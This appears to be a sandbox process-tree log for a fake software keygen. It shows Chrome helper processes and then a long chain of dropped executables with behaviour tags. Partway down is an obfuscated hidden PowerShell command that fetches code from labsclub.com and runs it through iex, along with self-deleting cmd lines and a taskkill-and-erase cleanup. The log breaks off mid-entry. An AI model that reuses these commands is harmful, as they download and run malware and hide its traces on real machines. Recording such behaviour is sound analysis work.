  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5740 /prefetch:8
  2⤵
  PID:2244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4736 /prefetch:8
  2⤵
  PID:1816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5372 /prefetch:8
  2⤵
  PID:1908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5764 /prefetch:8
  2⤵
  PID:1556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3860 /prefetch:8
  2⤵
  PID:4612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5416 /prefetch:8
  2⤵
  PID:4512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:8
  2⤵
  PID:4648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3656 /prefetch:8
  2⤵
  PID:4672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3420 /prefetch:8
  2⤵
  PID:4740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3920 /prefetch:8
  2⤵
  PID:2428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3996 /prefetch:8
  2⤵
  PID:4684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:8
  2⤵
  PID:4868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3628 /prefetch:8
  2⤵
  PID:4484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
  2⤵
  PID:4420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3836 /prefetch:8
  2⤵
  PID:5004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3516 /prefetch:8
  2⤵
  PID:4996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3480 /prefetch:8
  2⤵
  PID:5060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4920 /prefetch:8
  2⤵
  PID:2268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5180 /prefetch:8
  2⤵
  PID:5020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3920 /prefetch:8
  2⤵
  PID:996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:8
  2⤵
  PID:4136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:8
  2⤵
  PID:4316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5000 /prefetch:8
  2⤵
  PID:1344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5116 /prefetch:8
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3600 /prefetch:8
  2⤵
  PID:4644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3608 /prefetch:8
  2⤵
  PID:4784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
  2⤵
  PID:4800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:8
  2⤵
  PID:4788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3668 /prefetch:8
  2⤵
  PID:4684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6000 /prefetch:8
  2⤵
  PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6116 /prefetch:8
  2⤵
  PID:3804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:1
  2⤵
  PID:4128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4004 /prefetch:8
  2⤵
  PID:5028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3516 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4736 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1016 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:8
  2⤵
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:8
  2⤵
  PID:3760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4636 /prefetch:8
  2⤵
  PID:5116

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2788

C:\Users\Admin\AppData\Local\Temp\Temp2_Carbide.UI.Theme.Edition.keygen.by.Lz0.zip\Carbide.UI.Theme.Edition.keygen.by.Lz0.exe
"C:\Users\Admin\AppData\Local\Temp\Temp2_Carbide.UI.Theme.Edition.keygen.by.Lz0.zip\Carbide.UI.Theme.Edition.keygen.by.Lz0.exe"
1⤵
PID:4524
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  PID:4664
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    PID:4832
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
      4⤵
      Executes dropped EXE
      PID:5096
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:2432
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:1812
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
    keygen-step-2.exe
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    PID:4860
  - - C:\Users\Admin\AppData\Roaming\A019.tmp.exe
      "C:\Users\Admin\AppData\Roaming\A019.tmp.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4520
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\A019.tmp.exe"
        5⤵
        
        PID:5616
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:5444
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
      4⤵
      PID:4812
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        5⤵
        Runs ping.exe
        
        PID:4176
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    PID:4780
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      PID:2344
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:4692
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1484
    - - C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Maps connected drives based on registry
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3904
      - C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe" 1 3.1617573975.606a385752eca 101
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XOHWF7HDC2\multitimer.exe" 2 3.1617573975.606a385752eca
        7⤵
        Executes dropped EXE
        Checks for any installed AV software in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\3ilzcpjnxmg\px23tnqd4ls.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3ilzcpjnxmg\px23tnqd4ls.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\is-BET6E.tmp\px23tnqd4ls.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BET6E.tmp\px23tnqd4ls.tmp" /SL5="$C005C,2592217,780800,C:\Users\Admin\AppData\Local\Temp\3ilzcpjnxmg\px23tnqd4ls.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\is-RLUN9.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-RLUN9.tmp\winlthsth.exe"
        10⤵
        
        PID:5848
        
        C:\Users\Admin\AppData\Local\Temp\rKVHIYcDe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rKVHIYcDe.exe"
        11⤵
        
        PID:580
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        12⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif
        12⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        13⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:7940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:5516
        
        C:\Users\Admin\AppData\Local\Temp\5xs4k0chqm3\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5xs4k0chqm3\Setup3310.exe" /Verysilent /subid=577
        8⤵
        Executes dropped EXE
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\is-IRFOU.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IRFOU.tmp\Setup3310.tmp" /SL5="$901C0,138429,56832,C:\Users\Admin\AppData\Local\Temp\5xs4k0chqm3\Setup3310.exe" /Verysilent /subid=577
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\is-8QFUQ.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8QFUQ.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:2416
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
        11⤵
        
        PID:4208
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\is-DEDAN.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DEDAN.tmp\LabPicV3.tmp" /SL5="$40420,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        12⤵
        
        PID:2480
        
        C:\Users\Admin\AppData\Local\Temp\is-6SGPI.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-6SGPI.tmp\ppppppfy.exe" /S /UID=lab214
        13⤵
        
        PID:6996
        
        C:\Program Files\Internet Explorer\ZEHBBSKTOR\prolab.exe
        
        "C:\Program Files\Internet Explorer\ZEHBBSKTOR\prolab.exe" /VERYSILENT
        14⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Local\Temp\is-NR062.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NR062.tmp\prolab.tmp" /SL5="$50408,575243,216576,C:\Program Files\Internet Explorer\ZEHBBSKTOR\prolab.exe" /VERYSILENT
        15⤵
        
        PID:6196
        
        C:\Users\Admin\AppData\Local\Temp\b5-9dcb7-2e4-bed86-8f36331d896d6\Dycuhowaefu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b5-9dcb7-2e4-bed86-8f36331d896d6\Dycuhowaefu.exe"
        14⤵
        
        PID:4452
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qszlqpix.h12\md6_6ydj.exe & exit
        15⤵
        
        PID:7852
        
        C:\Users\Admin\AppData\Local\Temp\qszlqpix.h12\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\qszlqpix.h12\md6_6ydj.exe
        16⤵
        
        PID:2444
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0kh5gfex.edk\askinstall31.exe & exit
        15⤵
        
        PID:6528
        
        C:\Users\Admin\AppData\Local\Temp\0kh5gfex.edk\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\0kh5gfex.edk\askinstall31.exe
        16⤵
        
        PID:7952
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lp4hu1gt.xwx\toolspab1.exe & exit
        15⤵
        
        PID:7496
        
        C:\Users\Admin\AppData\Local\Temp\lp4hu1gt.xwx\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\lp4hu1gt.xwx\toolspab1.exe
        16⤵
        
        PID:7936
        
        C:\Users\Admin\AppData\Local\Temp\lp4hu1gt.xwx\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\lp4hu1gt.xwx\toolspab1.exe
        17⤵
        
        PID:7540
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chrw3ftx.5jf\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:4700
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4dmzkucd.hyw\setup_10.2_mix.exe & exit
        15⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\4dmzkucd.hyw\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\4dmzkucd.hyw\setup_10.2_mix.exe
        16⤵
        
        PID:5268
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qbwdqbtq.b0e\file.exe & exit
        15⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\qbwdqbtq.b0e\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\qbwdqbtq.b0e\file.exe
        16⤵
        
        PID:5236
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
        17⤵
        
        PID:6448
        
        C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:8960
        
        C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe" 1 3.1617574286.606a398e5def6 101
        19⤵
        
        PID:7884
        
        C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9KR7A8RL8S\multitimer.exe" 2 3.1617574286.606a398e5def6
        20⤵
        
        PID:5632
        
        C:\Users\Admin\AppData\Local\Temp\xt31fek5fyn\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xt31fek5fyn\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:10044
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        22⤵
        
        PID:9444
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        23⤵
        
        PID:9176
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        22⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:8892
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:8368
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:7748
        
        C:\Users\Admin\AppData\Local\Temp\0ohs5owl2av\dnvk3slcewa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0ohs5owl2av\dnvk3slcewa.exe" /ustwo INSTALL
        21⤵
        
        PID:10100
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "dnvk3slcewa.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\0ohs5owl2av\dnvk3slcewa.exe" & exit
        22⤵
        
        PID:9756
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "dnvk3slcewa.exe" /f
        23⤵
        Kills process with taskkill
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\a0352u2phsl\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a0352u2phsl\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:7300
        
        C:\Users\Admin\AppData\Local\Temp\rcnm1ul0w3m\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rcnm1ul0w3m\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:9280
        
        C:\Users\Admin\AppData\Local\Temp\3diect4u4jk\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3diect4u4jk\app.exe" /8-23
        21⤵
        
        PID:10180
        
        C:\Users\Admin\AppData\Local\Temp\QTGTAZLQLS\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QTGTAZLQLS\setups.exe" ll
        18⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\is-JPVCO.tmp\setups.tmp
        
